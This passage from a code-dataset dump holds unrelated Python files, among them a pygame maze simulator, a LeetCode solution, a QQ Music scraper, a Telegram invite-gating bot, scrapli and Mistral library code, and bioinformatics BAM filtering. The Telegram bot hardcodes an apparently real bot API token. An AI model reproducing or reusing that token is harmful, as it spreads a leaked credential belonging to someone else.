2][column_].obstacle, grid[row_ + 2][column_ + 1].obstacle, grid[row_ + 2][column_ - 1].obstacle) == (0, 0, 
0):\n return True\n\n return False\n\n\ndef check_obs_east(row_, column_):\n if (grid[row_][column_ + 2].obstacle, grid[row_ + 1][column_ + 2].obstacle, grid[row_ - 1][column_ + 2].obstacle) == (0, 0, 0):\n return True\n\n return False\n\n\ndef check_obs_west(row_, column_):\n if (grid[row_][column_ - 2].obstacle, grid[row_ + 1][column_ - 2].obstacle, grid[row_ - 1][column_ - 2].obstacle) == (0, 0, 0):\n return True\n\n return False\n\n\n\n\npygame.init()\nWINDOW_SIZE = [500, 480]\nscreen = pygame.display.set_mode(WINDOW_SIZE, pygame.RESIZABLE)\nfont = pygame.font.SysFont(\"comicsansms\", 24)\ntext = font.render(\"GO!\", True, (0, 128, 0))\ndone = False\nmove = False\nclock = pygame.time.Clock()\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n \n for event in pygame.event.get(): # User did something\n if event.type == pygame.QUIT: # If user clicked close\n done = True # Flag that we are done so we exit this loop\n \n elif event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n column = pos[0] // (WIDTH + MARGIN)\n row = pos[1] // (HEIGHT + MARGIN)\n print(row, column)\n \n if (row < 17 or column > 2) and (row > 2 or column < 12):\n cell = grid[row][column]\n cell.obstacle = 1\n print(\"Click \", pos, \"Grid coordinates: \", row, column)\n \n if 460 > pos[0] > 300 and 60 > pos[1] > 40:\n move = True\n\n if move:\n clock.tick(12)\n update_explored_cells(robot, grid)\n update_robot_dir(robot)\n robot_movement(robot)\n\n screen.fill(BLACK)\n\n for row in range(ROWS):\n for column in range(COLUMNS):\n color = WHITE\n \n if grid[row][column].obstacle == 1:\n color = RED\n \n for r in range(row - 1, row + 2):\n for c in range(column - 1, column + 2):\n if r < 0 or r >= ROWS or c < 0 or c >= COLUMNS:\n continue\n \n if grid[r][c].obstacle == 0:\n grid[r][c].virtual_wall = 1\n \n elif grid[row][column].virtual_wall == 1:\n color = GREY\n\n else:\n if grid[row][column].explored == 1:\n color = ORANGE\n \n pygame.draw.rect(screen, color,\n [(MARGIN + WIDTH) 
* column + MARGIN,\n (MARGIN + HEIGHT) * row + MARGIN,\n WIDTH, HEIGHT])\n\n # start\n pygame.draw.rect(screen, GREEN,\n [MARGIN, (MARGIN + HEIGHT) * 17 + MARGIN, WIDTH * 3 + MARGIN * 2, HEIGHT * 3 + MARGIN * 2])\n\n # goal\n pygame.draw.rect(screen, YELLOW,\n [(MARGIN + WIDTH) * 12 + MARGIN, MARGIN, WIDTH * 3 + MARGIN * 2, HEIGHT * 3 + MARGIN * 2])\n\n # robot\n pygame.draw.rect(screen, BLUE,\n [(MARGIN + WIDTH) * (robot.column - 1) + MARGIN,\n (MARGIN + HEIGHT) * (robot.row - 1) + MARGIN,\n WIDTH * 3 + MARGIN * 2, HEIGHT * 3 + MARGIN * 2])\n\n # button\n pygame.draw.rect(screen, WHITE, (380, 40, 80, 20))\n screen.blit(text, (405, 45))\n clock.tick(60)\n pygame.display.flip()\n\npygame.quit()\n","sub_path":"src/Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520239168","text":"#\r\n# @lc app=leetcode id=1124 lang=python3\r\n#\r\n# [1124] Longest Well-Performing Interval\r\n#\r\n# https://leetcode.com/problems/longest-well-performing-interval/description/\r\n#\r\n# algorithms\r\n# Medium (29.42%)\r\n# Likes: 147\r\n# Dislikes: 40\r\n# Total Accepted: 4.4K\r\n# Total Submissions: 14.8K\r\n# Testcase Example: '[9,9,6,0,6,6,9]'\r\n#\r\n# We are given hours, a list of the number of hours worked per day for a given\r\n# employee.\r\n#\r\n# A day is considered to be a tiring day if and only if the number of hours\r\n# worked is (strictly) greater than 8.\r\n#\r\n# A well-performing interval is an interval of days for which the number of\r\n# tiring days is strictly larger than the number of non-tiring days.\r\n#\r\n# Return the length of the longest well-performing interval.\r\n#\r\n#\r\n# Example 1:\r\n#\r\n#\r\n# Input: hours = [9,9,6,0,6,6,9]\r\n# Output: 3\r\n# Explanation: The longest well-performing interval is [9,9,6].\r\n#\r\n#\r\n#\r\n# Constraints:\r\n#\r\n#\r\n# 1 <= hours.length <= 10000\r\n# 0 <= hours[i] <= 
16\r\n#\r\n#\r\n#\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Solution:\r\n def longestWPI(self, hours) -> int:\r\n # 1. store dict of each diff's left and right index\r\n d = {}\r\n diff = 0\r\n for i, h in enumerate(hours):\r\n if h > 8:\r\n diff += 1\r\n else:\r\n diff -= 1\r\n if diff not in d:\r\n d[diff] = [i, i]\r\n d[diff][-1] = i\r\n minIndex = len(hours)\r\n res = 0\r\n # 2. store the current min left index\r\n # 3. if diff<=0: res=max(res, right-minIndex); else: res=max(res,right)\r\n for k in sorted(d.keys()):\r\n if k <= 0:\r\n res = max(res, d[k][1]-minIndex)\r\n else:\r\n res = max(res, d[k][1] + 1)\r\n minIndex = min(minIndex, d[k][0])\r\n return res\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(Solution().longestWPI([6, 6, 9]))\r\n","sub_path":"Medium/1124.longest-well-performing-interval.py","file_name":"1124.longest-well-performing-interval.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"492516693","text":"from selenium import webdriver\nimport requests\nimport json\n\ndic = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'\n}\ndriver = webdriver.Chrome(r'chromedriver.exe')\n\n\ndef get_music(msg):\n url1 = f'https://y.qq.com/portal/search.html#page=1&searchid=1&remoteplace=txt.yqq.top&t=song&w={msg}'\n driver.get(url1)\n driver.implicitly_wait(5) # 5秒钟之内元素加载完即可,智能等待\n data = driver.find_element_by_xpath('//*[@id=\"song_box\"]/div[2]/ul[2]/li[1]/div/div[2]/span[1]/a').get_attribute('href')\n # print(data)\n data = {\"mid\":data}\n\n url2 = 'http://www.douqq.com/qqmusic/qqapi.php'\n req = requests.post(url2, data=data,headers=dic).text\n req = req.replace(\"\\\\\",'')\n req = req.strip('\"')\n req = json.loads(req)\n return 
req['mp3_l']\n\n","sub_path":"qq_music.py","file_name":"qq_music.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"524677051","text":"\"\"\"initial commit\n\nRevision ID: 212f73d1fd15\nRevises: None\nCreate Date: 2014-10-01 18:19:21.649383\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '212f73d1fd15'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('loglevels',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('eventstatus',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('events',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('host', sa.String(length=256), nullable=True),\n sa.Column('pathname', sa.String(length=256), nullable=True),\n sa.Column('message', sa.UnicodeText(), nullable=True),\n sa.Column('user', sa.Integer(), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=True),\n sa.Column('level_id', sa.Integer(), nullable=True),\n sa.Column('status_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['level_id'], ['loglevels.id'], ),\n sa.ForeignKeyConstraint(['status_id'], ['eventstatus.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('events')\n op.drop_table('eventstatus')\n op.drop_table('loglevels')\n ### end Alembic commands ###\n","sub_path":"appen_dashboard/migrations/versions/212f73d1fd15_initial_commit.py","file_name":"212f73d1fd15_initial_commit.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329786354","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys,redis,re,time\r\nreload(sys)\r\nsys.setdefaultencoding(\"utf-8\")\r\nfrom telebot import TeleBot, types \r\n\r\nTOKEN = '403206452:AAGdunivaXO6ujyEsadcX5sbm_AqlOuD8mU' #yourbottokenkey\r\nnaji = 296805034 #yourid\r\n\r\nbot = TeleBot(TOKEN,threaded=False)\r\nredis = redis.StrictRedis(host='localhost', port=6379, db=9, decode_responses=True)\r\nbot_id = bot.get_me().id\r\n\r\ndef allowed(msg) :\r\n\tadmin = bot.get_chat_member(msg.chat.id, msg.from_user.id)\r\n\tif admin.status == 'creator' or admin.status == 'administrator':\r\n\t\t\treturn True\r\n\telif msg.from_user.id == naji:\r\n\t\treturn True\r\n\telif int(redis.hget(msg.chat.id, msg.from_user.id) or 0) > int(redis.hget(msg.chat.id, \"limit\") or 1) :\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\ndef gp(msg) : \r\n\treturn msg.chat.type == 'supergroup' or msg.chat.type == 'group'\r\ndef pv(msg) : \r\n\treturn msg.chat.type == 'private'\r\n\r\n@bot.message_handler(func=pv, content_types=['text', 'audio', 'document', 'gif', 'photo', 'sticker', 'video', 'voice', 'location', 'contact','game','video_note'])\r\ndef personal(msg):\r\n\ttry:\r\n\t\tif msg.from_user.id == naji and msg.text:\r\n\t\t\tif re.match(\"/fwd\", msg.text) and msg.reply_to_message:\r\n\t\t\t\tfor i in redis.smembers(\"bot:all\", msg.chat.id):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tbot.forward_message(i, msg.chat.id, msg.reply_to_message.id)\r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint(e)\r\n\t\t\t\t\t\t\r\n\t\t\tif re.match(\"/stats\", 
msg.text):\r\n\t\t\t\tbot.send_message(msg.chat.id, \"آمار\\nگروه ها : {}\\nخصوصی ها : {}\".format(redis.scard(\"bot:gps\"), redis.scard(\"bot:pvs\")))\r\n\t\telse:\r\n\t\t\tbot.send_message(msg.chat.id,\"رباتی برای افزایش اعضای گروه\\nفقط کافیه به گروهت دعوتش کنی و ادمینش کنی\")\r\n\t\t\tif not redis.sismember(\"bot:all\", msg.chat.id):\r\n\t\t\t\tredis.sadd(\"bot:pvs\", msg.chat.id)\r\n\t\t\t\tredis.sadd(\"bot:all\", msg.chat.id)\r\n\t\t\t\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\tpass\r\n\t\r\n\t\r\n@bot.message_handler(func=gp, content_types=['text', 'audio', 'document', 'gif', 'photo', 'sticker', 'video', 'voice', 'location', 'contact','game','video_note'])\r\ndef main(msg):\r\n\tif not redis.sismember(\"bot:all\", msg.chat.id):\r\n\t\tredis.sadd(\"bot:gps\", msg.chat.id)\r\n\t\tredis.sadd(\"bot:all\", msg.chat.id)\r\n\ttry:\r\n\t\tif msg.text and re.match(\"^[!#/][Ss]etlimit\", msg.text):\r\n\t\t\tadmin = bot.get_chat_member(msg.chat.id, msg.from_user.id)\r\n\t\t\tmax = re.search(\"(\\d+)\", msg.text).group(1)\r\n\t\t\tif (admin and admin.status == 'creator' or msg.from_user.id == naji) and max:\r\n\t\t\t\tredis.hset(msg.chat.id, \"limit\", int(max))\r\n\t\t\t\tbot.reply_to(msg, \"🍃 افزودن {} عضو جهت رفع محدودیت در گفتوگو ثبت شد 🍃\".format(max))\r\n\t\t\r\n\t\tif not allowed(msg):\r\n\t\t\tname = msg.from_user.last_name and msg.from_user.first_name + msg.from_user.last_name or msg.from_user.first_name\r\n\t\t\ttry:\r\n\t\t\t\tif redis.hget(msg.from_user.id, msg.chat.id):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tbot.delete_message(msg.chat.id, redis.hget(msg.from_user.id, msg.chat.id))\r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint(e)\r\n\t\t\t\tbot.delete_message(msg.chat.id, msg.message_id)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\t\t\t\treturn \"\"\r\n\t\t\tfinally:\r\n\t\t\t\tpm = bot.send_message(msg.chat.id, \"🌺 کاربر عزیز {} 🌺\\nهر عضو گروه موظفه {} نفرو به گروه اضافه کنه تا بتونه چت کنه 😅\\n\\nتعداد اعضا افزوده شده توسط شما : 
💫 {}💫\".format(name, redis.hget(msg.chat.id, \"limit\") or 1, redis.hget(msg.chat.id, msg.from_user.id) or 0))\r\n\t\t\t\tredis.hset(msg.from_user.id, msg.chat.id, pm.message_id)\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\tpass\r\n\t\t\r\n@bot.message_handler(content_types=['new_chat_members', 'left_chat_member'])\r\ndef add(msg):\r\n\tif msg.left_chat_member:\r\n\t\tredis.hdel(msg.chat.id, msg.left_chat_member.id)\r\n\telif msg.new_chat_members:\r\n\t\tfor user in msg.new_chat_members:\r\n\t\t\tif 'username' in user and user['username'].lower().endswith(\"bot\"):\r\n\t\t\t\treturn\r\n\t\t\telse:\r\n\t\t\t\tredis.hincrby(msg.chat.id, msg.from_user.id, 1)\r\n\r\nbot.polling(none_stop=True)\t","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51766927","text":"\"\"\"scrapli.driver.base.async_driver\"\"\"\nfrom types import TracebackType\nfrom typing import Any, Optional, Type\n\nfrom scrapli.channel import AsyncChannel\nfrom scrapli.driver.base.base_driver import BaseDriver\nfrom scrapli.exceptions import ScrapliValueError\nfrom scrapli.transport import ASYNCIO_TRANSPORTS\n\n\nclass AsyncDriver(BaseDriver):\n def __init__(self, **kwargs: Any):\n super().__init__(**kwargs)\n\n if self.transport_name not in ASYNCIO_TRANSPORTS:\n raise ScrapliValueError(\n \"provided transport is *not* an asyncio transport, must use an async transport with\"\n \" the AsyncDriver(s)\"\n )\n\n self.channel = AsyncChannel(\n transport=self.transport,\n base_channel_args=self._base_channel_args,\n )\n\n async def __aenter__(self) -> \"AsyncDriver\":\n \"\"\"\n Enter method for context manager\n\n Args:\n N/A\n\n Returns:\n AsyncDriver: opened AsyncDriver object\n\n Raises:\n N/A\n\n \"\"\"\n await self.open()\n return self\n\n async def __aexit__(\n self,\n exception_type: Optional[Type[BaseException]],\n exception_value: 
Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> None:\n \"\"\"\n Exit method to cleanup for context manager\n\n Args:\n exception_type: exception type being raised\n exception_value: message from exception being raised\n traceback: traceback from exception being raised\n\n Returns:\n None\n\n Raises:\n N/A\n\n \"\"\"\n await self.close()\n\n async def open(self) -> None:\n \"\"\"\n Open the scrapli connection\n\n Args:\n N/A\n\n Returns:\n None\n\n Raises:\n N/A\n\n \"\"\"\n self._pre_open_closing_log(closing=False)\n\n await self.transport.open()\n\n if (\n self.transport_name\n in (\n \"telnet\",\n \"asynctelnet\",\n )\n and not self.auth_bypass\n ):\n await self.channel.channel_authenticate_telnet(\n auth_username=self.auth_username, auth_password=self.auth_password\n )\n\n if self.on_open:\n await self.on_open(self)\n\n self._post_open_closing_log(closing=False)\n\n async def close(self) -> None:\n \"\"\"\n Close the scrapli connection\n\n Args:\n N/A\n\n Returns:\n None\n\n Raises:\n N/A\n\n \"\"\"\n self._post_open_closing_log(closing=True)\n\n if self.on_close:\n await self.on_close(self)\n\n if self.channel.channel_log:\n self.channel.channel_log.close()\n\n self.transport.close()\n\n self._post_open_closing_log(closing=True)\n","sub_path":"venv/Lib/site-packages/scrapli/driver/base/async_driver.py","file_name":"async_driver.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"292533009","text":"# Copyright 2014 - Mirantis, Inc.\n# Copyright 2015 - StackStorm, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# 
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral.db.v2 import api as db_api\nfrom mistral.engine1 import base\nfrom mistral.engine1 import rpc\nfrom mistral import expressions\nfrom mistral.services import scheduler\nfrom mistral.utils import wf_trace\nfrom mistral.workflow import data_flow\nfrom mistral.workflow import states\nfrom mistral.workflow import utils\n\n\n_ENGINE_CLIENT_PATH = 'mistral.engine1.rpc.get_engine_client'\n\n\ndef _log_task_delay(task_db, delay_sec):\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> %s, delay = %s sec]\" %\n (task_db.name, task_db.state, states.DELAYED, delay_sec)\n )\n\n\ndef build_policies(policies_spec, wf_spec):\n task_defaults = wf_spec.get_task_defaults()\n wf_policies = task_defaults.get_policies() if task_defaults else None\n\n if not (policies_spec or wf_policies):\n return []\n\n return construct_policies_list(policies_spec, wf_policies)\n\n\ndef get_policy_factories():\n return [\n build_wait_before_policy,\n build_wait_after_policy,\n build_retry_policy,\n build_timeout_policy,\n build_pause_before_policy,\n build_concurrency_policy\n ]\n\n\ndef construct_policies_list(policies_spec, wf_policies):\n policies = []\n\n for factory in get_policy_factories():\n policy = factory(policies_spec)\n\n if wf_policies and not policy:\n policy = factory(wf_policies)\n\n if policy:\n policies.append(policy)\n\n return policies\n\n\ndef build_wait_before_policy(policies_spec):\n if not policies_spec:\n return None\n\n wait_before = policies_spec.get_wait_before()\n\n return WaitBeforePolicy(wait_before) if wait_before > 0 else None\n\n\ndef build_wait_after_policy(policies_spec):\n if not policies_spec:\n return None\n\n wait_after = policies_spec.get_wait_after()\n\n return WaitAfterPolicy(wait_after) if wait_after > 0 else None\n\n\ndef build_retry_policy(policies_spec):\n if not 
policies_spec:\n return None\n\n retry = policies_spec.get_retry()\n\n if not retry:\n return None\n\n return RetryPolicy(\n retry.get_count(),\n retry.get_delay(),\n retry.get_break_on()\n )\n\n\ndef build_timeout_policy(policies_spec):\n if not policies_spec:\n return None\n\n timeout_policy = policies_spec.get_timeout()\n\n return TimeoutPolicy(timeout_policy) if timeout_policy > 0 else None\n\n\ndef build_pause_before_policy(policies_spec):\n if not policies_spec:\n return None\n\n pause_before_policy = policies_spec.get_pause_before()\n\n return (PauseBeforePolicy(pause_before_policy)\n if pause_before_policy else None)\n\n\ndef build_concurrency_policy(policies_spec):\n if not policies_spec:\n return None\n\n concurrency_policy = policies_spec.get_concurrency()\n\n return (ConcurrencyPolicy(concurrency_policy)\n if concurrency_policy else None)\n\n\ndef _ensure_context_has_key(runtime_context, key):\n if not runtime_context:\n runtime_context = {}\n\n if key not in runtime_context:\n runtime_context.update({key: {}})\n\n return runtime_context\n\n\nclass WaitBeforePolicy(base.TaskPolicy):\n def __init__(self, delay):\n self.delay = delay\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'wait_before_policy'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n task_db.runtime_context = runtime_context\n\n policy_context = runtime_context[context_key]\n\n if policy_context.get('skip'):\n # Unset state 'DELAYED'.\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> %s]\"\n % (task_db.name, states.DELAYED, states.RUNNING)\n )\n\n task_db.state = states.RUNNING\n\n return\n\n policy_context.update({'skip': True})\n\n _log_task_delay(task_db, self.delay)\n\n task_db.state = states.DELAYED\n\n scheduler.schedule_call(\n _ENGINE_CLIENT_PATH,\n 'run_task',\n self.delay,\n task_id=task_db.id\n )\n\n\nclass WaitAfterPolicy(base.TaskPolicy):\n def 
__init__(self, delay):\n self.delay = delay\n\n def after_task_complete(self, task_db, task_spec, result):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'wait_after_policy'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n task_db.runtime_context = runtime_context\n\n policy_context = runtime_context[context_key]\n\n if policy_context.get('skip'):\n # Need to avoid terminal states.\n if not states.is_completed(task_db.state):\n # Unset state 'DELAYED'.\n\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> %s]\"\n % (task_db.name, states.DELAYED, states.RUNNING)\n )\n\n task_db.state = states.RUNNING\n\n return\n\n policy_context.update({'skip': True})\n\n _log_task_delay(task_db, self.delay)\n\n # Set task state to 'DELAYED'.\n task_db.state = states.DELAYED\n\n serializers = {\n 'result': 'mistral.workflow.utils.TaskResultSerializer'\n }\n\n scheduler.schedule_call(\n _ENGINE_CLIENT_PATH,\n 'on_task_result',\n self.delay,\n serializers,\n task_id=task_db.id,\n result=result\n )\n\n\nclass RetryPolicy(base.TaskPolicy):\n def __init__(self, count, delay, break_on):\n self.count = count\n self.delay = delay\n self.break_on = break_on\n\n def after_task_complete(self, task_db, task_spec, result):\n \"\"\"Possible Cases:\n\n 1. state = SUCCESS\n No need to move to next iteration.\n 2. retry:count = 5, current:count = 2, state = ERROR,\n state = IDLE/DELAYED, current:count = 3\n 3. 
retry:count = 5, current:count = 4, state = ERROR\n Iterations complete therefore state = #{state}, current:count = 4.\n \"\"\"\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'retry_task_policy'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n task_db.runtime_context = runtime_context\n\n state = states.ERROR if result.is_error() else states.SUCCESS\n\n if state != states.ERROR:\n return\n\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> ERROR]\"\n % (task_db.name, task_db.state)\n )\n\n outbound_context = task_db.result\n\n policy_context = runtime_context[context_key]\n\n retry_no = 0\n\n if 'retry_no' in policy_context:\n retry_no = policy_context['retry_no']\n del policy_context['retry_no']\n\n retries_remain = retry_no + 1 < self.count\n\n break_early = (\n expressions.evaluate(self.break_on, outbound_context)\n if self.break_on and outbound_context else False\n )\n\n if not retries_remain or break_early:\n return\n\n _log_task_delay(task_db, self.delay)\n\n task_db.state = states.DELAYED\n\n policy_context['retry_no'] = retry_no + 1\n runtime_context[context_key] = policy_context\n\n scheduler.schedule_call(\n _ENGINE_CLIENT_PATH,\n 'run_task',\n self.delay,\n task_id=task_db.id\n )\n\n\nclass TimeoutPolicy(base.TaskPolicy):\n def __init__(self, timeout_sec):\n self.delay = timeout_sec\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n\n scheduler.schedule_call(\n None,\n 'mistral.engine1.policies.fail_task_if_incomplete',\n self.delay,\n task_id=task_db.id,\n timeout=self.delay\n )\n\n wf_trace.info(\n task_db,\n \"Timeout check scheduled [task=%s, timeout(s)=%s].\" %\n (task_db.id, self.delay)\n )\n\n\nclass PauseBeforePolicy(base.TaskPolicy):\n def __init__(self, expression):\n self.expr = expression\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n\n 
if not expressions.evaluate(self.expr, task_db.in_context):\n return\n\n wf_trace.info(\n task_db,\n \"Workflow paused before task '%s' [%s -> %s]\" %\n (task_db.name, task_db.execution.state, states.PAUSED)\n )\n\n task_db.execution.state = states.PAUSED\n task_db.state = states.IDLE\n\n\nclass ConcurrencyPolicy(base.TaskPolicy):\n def __init__(self, concurrency):\n self.concurrency = concurrency\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'concurrency'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n runtime_context[context_key] = self.concurrency\n task_db.runtime_context = runtime_context\n\n\ndef fail_task_if_incomplete(task_id, timeout):\n task_db = db_api.get_task(task_id)\n\n if not states.is_completed(task_db.state):\n msg = \"Task timed out [task=%s, timeout(s)=%s].\" % (task_id, timeout)\n\n wf_trace.info(task_db, msg)\n\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> ERROR]\"\n % (task_db.name, task_db.state)\n )\n\n rpc.get_engine_client().on_task_result(\n task_id,\n utils.TaskResult(error=msg)\n )\n","sub_path":"mistral/engine1/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":10461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"417165539","text":"from PIL import Image\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom PCV.tools import imtools, pca\n\n# Get list of images and their size\nimlist = imtools.get_imlist('../data/fontimages/') # fontimages.zip is part of the book data set\nim = np.array(Image.open(imlist[0])) # open one image to get the size\nm, n = im.shape[:2]\n\n# Create matrix to store all flattened images\nimmatrix = np.array([np.array(Image.open(imname)).flatten() for imname in imlist], 'f')\n\n# Perform PCA\nV, S, immean = pca.pca(immatrix)\n\n# Show the images (mean and 7 first modes)\n# This gives figure 1-8 
(p15) in the book.\nplt.figure()\nplt.gray()\nplt.subplot(2, 4, 1)\nplt.imshow(immean.reshape(m, n))\nfor i in range(7):\n plt.subplot(2, 4, i + 2)\n plt.imshow(V[i].reshape(m, n))\nplt.show()\n","sub_path":"examples/ch1_3_pca_graylevel.py","file_name":"ch1_3_pca_graylevel.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461182758","text":"\n# get filtered bam of different species for other analysis\n# bsub_script='bsub -q Z-ZQF -n 10 '\n\nfrom process_atac import split_bam\nfrom multiprocessing import Process\nimport pysam\nimport os\n\n\ndef get_filtered_bc(filtered_cell_file):\n bc_list=[]\n with open(filtered_cell_file) as input:\n input.readline()\n for line in input:\n bc=line.rstrip('\\n').split(',')[0]\n bc_list.append(bc)\n return bc_list\n\n\ndef get_bc_umi(bc_list, assignment_file):\n bc_umi={}\n for bc in bc_list:\n bc_umi[bc]=[]\n with open(assignment_file) as input:\n input.readline()\n for line in input:\n items=line.rstrip('\\n').split(',')\n bc=items[0]\n umi=items[4]\n if bc in bc_umi.keys():\n bc_umi[bc].append(umi)\n return bc_umi\n\n\ndef filter_chunk(output_dir,sample,bc_umi,config,chunk=None):\n\t# filter by read quality and filtered barcode\n\t# keep the longest read for each umi\n\n\tmin_mapq=config.min_mapq\n\tmax_flen=config.max_flen\n\n\tif chunk is None:\n\t\tbamfile = output_dir + '/mapping/'+sample+ '.Aligned.sorted.bam'\n\t\toutput_filename = output_dir +'/atac_qc/'+sample+ '_filtered.bam'\n\telse:\n\t\tbamfile = output_dir +'/mapping/'+sample+ '.Aligned.sorted.chunk%d.bam' %chunk\n\t\toutput_filename = output_dir +'/atac_qc/'+sample+ '_filtered.chunk%d.bam' %chunk\n\n\tinbam=pysam.Samfile(bamfile)\n\tfiltered_bam = pysam.Samfile(output_filename, \"wb\", template=inbam)\n\t\n\tbc_prev=''\n\tumi_prev=''\n\tseqname_prev=''\n\tfor read in inbam:\n\t\trname = str(read.reference_name)\n\t\tif read.is_unmapped or read.mate_is_unmapped or 
(\"chrM\" in rname) or read.is_secondary: continue\n\t\tif read.is_proper_pair and (abs(read.isize) <= max_flen) and (read.mapq >= min_mapq):\n\t\t\tif read.is_read1:\n\t\t\t\tseqname=read.qname\n\t\t\t\tbc=seqname.split('_')[-1].split(':')[0]\n\t\t\t\tumi=seqname.split(':')[1]\n\t\t\t\tif bc in bc_umi.keys():\n\t\t\t\t\tif umi in bc_umi[bc]:\n\t\t\t\t\t\tif (bc,umi)!=(bc_prev,umi_prev): # keep the first read pair for each umi\n\t\t\t\t\t\t\tfiltered_bam.write(read)\n\t\t\t\t\t\t\t#filtered_bam.write(inbam.mate(read))\n\t\t\t\t\t\t\tbc_prev=bc\n\t\t\t\t\t\t\tumi_prev=umi\n\t\t\t\t\t\t\tseqname_prev=seqname\n\t\t\telif read.is_read2: # write read2 if read1 is written\n\t\t\t\tseqname=read.qname\n\t\t\t\tif seqname==seqname_prev:\n\t\t\t\t\tfiltered_bam.write(read)\n\tfiltered_bam.close()\n\tinbam.close()\n\n\ndef join_bam(output_dir,sample,nthreads):\n filenames = [output_dir +'/atac_qc/'+sample+ '_filtered.chunk%d.bam' %i for i in range(1,nthreads+1)]\n inbam=pysam.Samfile(output_dir + '/mapping/'+sample+ '.Aligned.sorted.bam')\n outbam=pysam.Samfile(output_dir + '/atac_qc/'+sample+ '_filtered.bam', \"wb\", template=inbam) #,header=inbam.header\n inbam.close()\n for f in filenames:\n \tinbam=pysam.Samfile(f)\n \tfor read in inbam:\n \t\toutbam.write(read)\n \tinbam.close()\n outbam.close()\n \n\ndef filter_bam(output_dir, sample, config, nthreads):\n\t\"\"\" Gets molecular info for a bam file. 
